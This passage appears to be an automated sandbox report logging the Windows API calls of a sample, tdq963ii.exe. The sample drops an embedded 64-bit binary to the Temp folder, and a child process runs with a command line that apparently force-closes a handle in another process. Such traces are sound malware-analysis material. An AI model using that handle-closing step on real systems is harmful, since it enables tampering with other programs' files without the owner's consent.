lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0184.236] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0184.237] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0184.237] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0184.237] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0184.237] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0184.237] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0184.264] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3bc) returned 0x3060a8 [0184.264] GetCurrentThreadId () returned 0x5a8 [0184.264] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x18) returned 0x306470 [0184.265] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x306490 [0184.987] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"spcwin.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x36f341be, hStdError=0x0)) [0184.987] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0184.987] GetFileType (hFile=0x3) returned 0x2 [0184.989] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0184.989] GetFileType (hFile=0x80) returned 0x3 [0184.989] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0184.989] GetFileType (hFile=0xb) returned 0x2 [0184.989] GetCommandLineW () returned="tdq963ii.exe -accepteula \"spcwin.exe\" -nobanner" [0184.989] GetEnvironmentStringsW () returned 0x306c98* [0184.990] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0xb7c) returned 0x307820 [0184.993] FreeEnvironmentStringsW (penv=0x306c98) returned 1 [0184.994] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0184.994] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x70) returned 0x306c98 [0184.998] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa0) returned 0x306d10 [0184.998] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3e) returned 0x3083c0 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x6c) returned 0x306db8 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x6e) returned 0x306e30 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x78) returned 0x2ff8c8 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x62) returned 0x306ea8 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2e) returned 0x306f18 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x306f50 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x20) returned 0x305a78 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x28) returned 0x306fa0 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1a) returned 0x305aa0 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4a) returned 0x306fd0 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x72) returned 0x2ff948 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x30) returned 0x307028 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2e) returned 0x307060 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1c) returned 0x305ac8 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xd2) returned 0x307098 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x7c) returned 0x307178 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x36) returned 0x307200 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3a) returned 0x308408 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x90) returned 0x307240 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x3072d8 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x30) returned 0x307308 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x36) returned 0x307340 [0185.017] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x307380 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x52) returned 0x3073d0 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3c) returned 0x308450 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x18) returned 0x307430 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x82) returned 0x307450 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2e) returned 0x3074e0 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1e) returned 0x305af0 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2c) returned 0x307518 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x54) returned 0x307550 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x52) returned 0x3075b0 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2a) returned 0x307610 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3c) returned 0x308498 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x54) returned 0x307648 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x3076a8 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x30) returned 0x3076d8 [0185.018] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x8c) returned 0x307710 [0185.018] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x307820 | out: hHeap=0x2f0000) returned 1 [0185.522] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x3077a8 [0185.522] GetLastError () returned 0x0 [0185.522] SetLastError (dwErrCode=0x0) [0185.523] GetLastError () returned 0x0 [0185.523] SetLastError (dwErrCode=0x0) [0185.523] GetLastError () returned 0x0 [0185.523] SetLastError (dwErrCode=0x0) [0185.523] GetACP () returned 0x4e4 [0185.523] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x220) returned 0x307fb0 [0185.523] GetLastError () returned 0x0 [0185.523] SetLastError (dwErrCode=0x0) [0185.523] IsValidCodePage (CodePage=0x4e4) returned 1 [0185.524] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0185.524] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0185.526] GetLastError () returned 0x0 [0185.526] SetLastError (dwErrCode=0x0) [0185.526] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0185.528] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0185.528] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0185.528] GetLastError () returned 0x0 [0185.528] SetLastError (dwErrCode=0x0) [0185.529] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0185.529] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0185.529] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0185.529] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0185.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ.@ó6äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0185.529] GetLastError () returned 0x0 [0185.529] SetLastError (dwErrCode=0x0) [0185.529] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0185.529] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0185.529] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0185.529] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0185.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ.@ó6äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0185.530] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x80) returned 0x3081d8 [0186.299] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0186.299] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0186.299] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3081d8) returned 0x80 [0186.299] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0186.299] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0186.300] GetCurrentProcess () returned 0xffffffff [0186.300] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0186.300] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0186.300] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0186.303] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0186.303] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0186.303] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0186.303] LockResource (hResData=0x43c648) returned 0x43c648 [0186.303] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x18) returned 0x308260 [0186.304] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.323] GetLastError () returned 0x20 [0186.323] GetLastError () returned 0x20 [0186.323] SetLastError (dwErrCode=0x20) [0186.323] GetLastError () returned 0x20 [0186.323] SetLastError (dwErrCode=0x20) [0186.323] GetLastError () returned 0x20 [0186.323] SetLastError (dwErrCode=0x20) [0186.324] GetLastError () returned 0x20 [0186.324] SetLastError (dwErrCode=0x20) [0186.325] GetLastError () returned 0x20 [0186.325] SetLastError (dwErrCode=0x20) [0186.325] GetLastError () returned 0x20 [0186.325] SetLastError (dwErrCode=0x20) [0186.325] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x1000) returned 0x3097f0 [0186.328] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0186.329] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3077a8 | out: hHeap=0x2f0000) returned 1 [0186.330] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0186.330] ExitProcess (uExitCode=0x1) [0186.331] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3060a8 | out: hHeap=0x2f0000) returned 1 Process: id = "172" image_name = "tdq963ii64.exe" filename = "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe" page_root = "0x2fa17000" os_pid = "0x91c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "161" os_parent_pid = "0xa2c" cmd_line = "tdq963ii.exe -accepteula -c 130 -y -p 2880 -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 